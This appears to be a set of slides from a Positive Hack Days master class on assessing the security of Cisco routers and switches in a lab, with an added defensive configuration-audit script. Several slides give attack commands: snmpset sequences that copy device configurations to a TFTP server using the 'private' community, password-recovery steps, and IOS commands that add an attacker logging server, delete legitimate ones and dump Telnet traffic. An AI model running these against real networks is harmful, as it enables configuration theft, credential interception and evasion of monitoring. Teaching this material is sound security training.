Master class «Analysis of network infrastructure security». Sergey Pavlov, Positive Technologies

Positive Hack Days. Pavlov. Network Infrastructure Security Assessment


DESCRIPTION

Participants will acquire basic skills in searching for vulnerabilities on switches and routers from various vendors. The master class covers both common network vulnerabilities and exceptional cases that can be detected during security assessments of real networks.


Page 1

Master class «Analysis of network infrastructure security»

Sergey Pavlov

Positive Technologies

Page 2

Introduction

(Network diagram: DMZ, Internet, Branch, User networks, Server networks, Network hub)

Page 3

Laboratory work

Scanning

SNMP default community strings

Management accounts for Telnet and SSH

Network device default settings

Event logging

VPN

Summary

Page 4

Part 1. Scanning

Attackers always use scanning as the first step, to enumerate the available services.

The information can be used to:
• brute-force accounts and passwords
• detect service versions

Page 5

Practical task (1)

Start the virtual machine

Scan the specified port of the network device with Nmap.

Page 6

Part 2: SNMP default community strings

Page 7

SNMPv1/2

Privileges in SNMP

• Read-only – this mode is used only to monitor the device, not to manage it.

• Read-write is used for both device monitoring and management.

Here is an example of SNMP community string brute force with the SNSCAN utility (McAfee):

Page 8

Copy configuration file via SNMP

(Diagram: network device → TFTP server)

// Copy the running configuration from the device to the TFTP server
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <TFTP server address>
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

// Copy the configuration file (startup-config) back to the device
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <TFTP server address>
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1
// Reload the device to apply the changes

Page 9

Practical task (2)

Enable TFTP server

Bruteforce SNMP password

Copy configuration file to TFTP server

Page 10

Part 3. Management accounts for Telnet and SSH

Page 11

Privilege types

Default privileges
• The user has limited privileges (level 1) to execute basic commands

High privileges
• The «enable» (level 15) password is needed to gain privileges on Cisco devices

Page 12

User password types

Without encryption
• username cisco password 0 cisco

Weak encryption
• username admin password 7 104F0D140C1953

A number of utilities can recover such a password, for example Cain&Abel. Recovery takes a split second.

Password hash
• enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0

Recovery requires brute force, using software such as Cain&Abel, PasswordPro, John the Ripper, etc. The time needed is unpredictable.

Page 13

Practical task (3)

Recover the “admin” user password

Recover the enable password

Page 14

Part 4. Network device default settings

Page 15

Examples

Device configurations often contain default values. We do not notice them, but they exist ;)

• If aaa new-model is enabled, the following values are used:
  aaa authentication login default local – for vty
  aaa authentication login default none – for con

• The HTTP server does not depend on the “AAA” service and uses the “enable” password by default

Page 16

Practical task (4)

Enter “AdMIn” instead of “admin” to log in to the device via Telnet

Log in to the device via HTTP using the enable password only

Create a new user via the web interface

Check that the new user can log in via Telnet

Page 17

Part 5. Event logging. GOOD or BAD?

Page 18

Event logging functions

Event logging helps to:

• Troubleshoot network faults
• Detect unauthorized access attempts
• Track changes to configurations and devices

BUT! Event logging can also play a negative role:

• When a new logging server is added to the configuration, the attacker receives the same data as the network administrator

• The logging service makes it possible to intercept user accounts and passwords in the traffic passing through the device

Page 19

Add a new event logging server

Add a new server
MC#conf t
MC(config)#logging 192.168.123.4

Delete the others… to prevent interference ;)
MC#conf t
MC(config)#no logging 1.2.3.4

Page 20

Unable to capture traffic?! But what if you really want to? … You can

MC#conf t
MC(config)#logging trap 7
MC(config)#access-list 122 permit tcp any any eq telnet
MC(config)#end
MC#debug ip packet 122 detail dump

New events are interesting, but device traffic is also interesting, especially unencrypted traffic. You can use undocumented Cisco IOS features.
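Parts 3, 4 and 5 describe weaknesses that are all visible in a device's running configuration: reversible password types, default SNMP community strings, the AAA and HTTP-server defaults, and a logging server nobody on the network team configured. The following audit script is an added example (not from the master class or Positive Technologies) that flags those conditions in a saved IOS configuration; the sample configuration and the allowlist of legitimate logging servers are constructed, and the `username`/`enable` lines reuse the slide examples.

```python
import re

# Constructed sample configuration (not the lab device's); the username and
# enable lines are the examples shown on the slides.
SAMPLE_CONFIG = """\
hostname MC
aaa new-model
username cisco password 0 cisco
username admin password 7 104F0D140C1953
enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0
snmp-server community private RW
snmp-server community public RO
ip http server
logging 10.0.0.5
logging 192.168.123.4
"""

# Assumed allowlist: syslog servers the network team actually operates.
KNOWN_LOG_SERVERS = {"10.0.0.5"}
DEFAULT_COMMUNITIES = {"public", "private"}


def audit_ios_config(text, known_log_servers=KNOWN_LOG_SERVERS):
    """Return (severity, finding) tuples for the weaknesses covered in Parts 3-5."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    findings = []
    for ln in lines:
        # Type 0 (plaintext) and type 7 (reversible) passwords on users or enable.
        m = re.match(r"(?:username (\S+) .*?|enable )password (0|7) ", ln)
        if m:
            who = f"user {m.group(1)}" if m.group(1) else "enable"
            kind = "plaintext" if m.group(2) == "0" else "type 7 (reversible)"
            findings.append(("high", f"{who}: {kind} password"))
        # Default community strings; RW is worse because it allows config copy.
        m = re.match(r"snmp-server community (\S+)(?: view \S+)? (RO|RW)", ln)
        if m and m.group(1).lower() in DEFAULT_COMMUNITIES:
            sev = "high" if m.group(2) == "RW" else "medium"
            findings.append((sev, f"default SNMP community '{m.group(1)}' with {m.group(2)}"))
        # A logging host outside the allowlist may have been added by an attacker.
        m = re.match(r"logging (?:host )?(\d+\.\d+\.\d+\.\d+)$", ln)
        if m and m.group(1) not in known_log_servers:
            findings.append(("high", f"unknown logging server {m.group(1)} (possible attacker-added)"))
    # Defaults from Part 4: no explicit login list and HTTP relying on the enable password.
    if "aaa new-model" in lines and not any(l.startswith("aaa authentication login ") for l in lines):
        findings.append(("medium", "aaa new-model without explicit 'aaa authentication login' list"))
    if "ip http server" in lines and not any(l.startswith("ip http authentication ") for l in lines):
        findings.append(("medium", "ip http server without 'ip http authentication' (enable password used)"))
    return findings


if __name__ == "__main__":
    for severity, finding in audit_ios_config(SAMPLE_CONFIG):
        print(f"[{severity}] {finding}")
```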

Page 21

Practical task (5)

Enable logging server

Add new logging server on a network device

Log Telnet service traffic

Page 22

Part 6. VPN

Page 23

Why do I need a VPN?

Without a VPN, only boundary devices are reachable from public networks.

A VPN gives access to services that are usually blocked by providers, for example 445/TCP.

Network devices do not support all popular services. For example, it is impossible to start an RDP session from a mobile device.

Page 24

VPN types

GRE is a tunnelling protocol that does not provide encryption. Its main aim is to encapsulate network-layer packets into IP packets.

L2TP is a tunnelling protocol that does not itself provide encryption or confidentiality; it relies on a protocol in which it is encapsulated to provide confidentiality.

PPTP is a point-to-point tunnelling protocol. It allows tunnels to be created for data exchange.

IPsec makes it possible to authenticate and/or encrypt IP packets.

Page 25

PPTP configuration example

aaa new-model
aaa authentication ppp default local
vpdn enable
!
vpdn-group 1
 ! Default PPTP VPDN group
 accept-dialin
  protocol pptp
  virtual-template 1
 local name tunnel
!
interface Virtual-Template1
 ip unnumbered FastEthernet0/1
 ip mroute-cache
 peer default ip address pool default
 ppp encrypt mppe auto
 ppp authentication ms-chap
!
ip local pool default 1.1.1.10 1.1.1.100

Page 26

Practical task (6)

Configure PPTP, connect to the device

Test if 1.1.1.1 host is available

Page 27

Summary

Page 28

Summary

Do not leave network devices without control: once compromised, they allow attackers to manipulate the whole network

Use best practices for network device security settings

Use comprehensive network device protection

Keep monitoring network security

Page 29

Additional data and links

SNMPv1/2 scanning: SNSCAN, Hydra

Copy configuration via SNMP

PPTP configuration

BackTrack distribution kit

Page 30

Thank you for your attention!

[email protected]